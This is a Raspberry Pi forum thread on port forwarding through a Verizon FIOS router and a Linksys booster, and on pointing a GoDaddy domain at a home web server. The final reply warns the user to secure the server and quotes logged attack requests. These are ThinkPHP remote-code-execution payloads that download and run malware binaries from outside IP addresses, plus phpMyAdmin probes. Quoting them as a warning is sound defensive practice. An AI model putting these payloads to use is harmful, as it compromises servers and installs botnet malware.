cdoern

port forwarding and linking to an already owned domain

Tue Feb 05, 2019 1:27 am

Hi, I am trying to transfer my godaddy domain and hosting over to my own raspberry pi (cheaper and easy access to files).

I am stuck with two things currently, I have a verizon fios router and a linksys E8350 booster. Both of these when you log in, have the option for port forwarding. However, neither of them, as per the directions I have followed, work.

Other than this, I am also not seeing in any tutorials on how to actually link a preexisting domain. I need to do this for a project I am working on and both of these are roadblocks for me, thanks for any help in advance. If anyone has any suggestions on how to proceed with these two issues, let me know I will try to keep working at it as well.

Attached below are what I currently have activated for port forwarding, I go to test it and it says port 80 is closed.
Attachments
link.PNG
link.PNG (1.52 KiB) Viewed 259 times
verizon.PNG
verizon.PNG (3.36 KiB) Viewed 259 times

Ernst

Re: port forwarding and linking to an already owned domain

Tue Feb 05, 2019 7:42 am

cdoern wrote:
Tue Feb 05, 2019 1:27 am
Hi, I am trying to transfer my godaddy domain and hosting over to my own raspberry pi (cheaper and easy access to files).

I am stuck with two things currently, I have a verizon fios router and a linksys E8350 booster. Both of these when you log in, have the option for port forwarding. However, neither of them, as per the directions I have followed, work.

Other than this, I am also not seeing in any tutorials on how to actually link a preexisting domain. I need to do this for a project I am working on and both of these are roadblocks for me, thanks for any help in advance. If anyone has any suggestions on how to proceed with these two issues, let me know I will try to keep working at it as well.

Attached below are what I currently have activated for port forwarding, I go to test it and it says port 80 is closed.
If you have not opened the door then the door will be closed: to open the door (port 80) you must have a service that has opened port 80 and is waiting for a connection.

In your configuration you should have two networks, the external network from you service provider and the internal network that you have configured. I have this funny idea that you have a verizon router to connect to the ISP followed by a linksys to provide connectivity. This makes it more difficult because I do not have a clue how this has been setup.
What must be done is that port 80 is forwarded from the ISP network to the internal system that has opened the port.
In the worst case you may have to forward port 80 from the verizon to the linksys on which you forward to your webserver (that is two times port forwarding) if there is another network between the verizon and the linksys.

To link the pre-existing domain is theoretically simple but can be practically difficult. What I would suggest is that you investigate if it is possible to have godaddy redirect your domain to another IP address or a dynamic dns provider.
If you do not have a fixed IP-address on your home system then you will need a dynamic dns provider and something that will be used to update your IP address. (note: with google I found hints that godaddy can be used for ddns).

Disclaimer: I do not have any information on verizon, linksys E8350 or godaddy
The road to insanity is paved with static ip addresses

btidey

Tue Feb 05, 2019 8:38 am

I originally had an older model Verizon FIOS router with port forwarding working, but it broke and got replaced by a newer model where port forwarding seemed to be non-functional.

This was not a problem for me as I already had a router behind this (running Tomato software) to give better wifi coverage and to get round other limitations of the FIOS router (e.g. limited static dhcp addresses). So I just run the FIOS router in modem mode and then do the port forwarding in the tomato router.

Ernst

Tue Feb 05, 2019 9:12 am

btidey wrote:
Tue Feb 05, 2019 8:38 am
I originally had an older model Verizon FIOS router with port forwarding working, but it broke and got replaced by a newer model where port forwarding seemed to be non-functional.

This was not a problem for me as I already had a router behind this (running Tomato software) to give better wifi coverage and to get round other limitations of the FIOS router (e.g. limited static dhcp addresses). So I just run the FIOS router in modem mode and then do the port forwarding in the tomato router.
In that case you should only need to forward port 80 on the (Tomato) router because the FIOS router should function as a transparent bridge. But you still need something (like Apache2) to open port 80 on the raspberry.
For testing you could get a temporary DDNS entry with one of the free DDNS providers (like https://www.noip.com/) to give access to your home server.

WARNING: Make sure that you have secured your web server before allowing external access because there is a lot of activity at the moment trying to inject malware in to badly configured installations. Below are a few of the attempts to break into my server:

Code: Select all

GET /index.php?s=/index/^Ihink^Gpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://104.168.143.19/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" from 172.245.30.59
GET /index.php?s=/index/^Ihink^Gpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.114/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" from 144.132.10.218
GET /index.php?s=/index/^Ihink^Gpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.114/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" from 1.215.205.157
GET /index.php?s=/index/^Ihink^Gpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.241/bins/cock.x86 -O /tmp/.cock; chmod 777 /tmp/.cock; /tmp/.cock cock.x86' HTTP/1.1" from 31.184.198.147
GET /websql/scripts/setup.php HTTP/1.1" from 54.39.182.83
GET /phpMyAdmin-2.9.0/scripts/setup.php HTTP/1.1" from 54.39.182.83
GET /phpMyAdmin-2.11.1-all-languages/scripts/setup.php HTTP/1.1" from 54.39.182.83
GET /phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.1" from 54.39.182.83
In my syslog I have 750+ entries over the last two days.
The road to insanity is paved with static ip addresses

Return to “Beginners”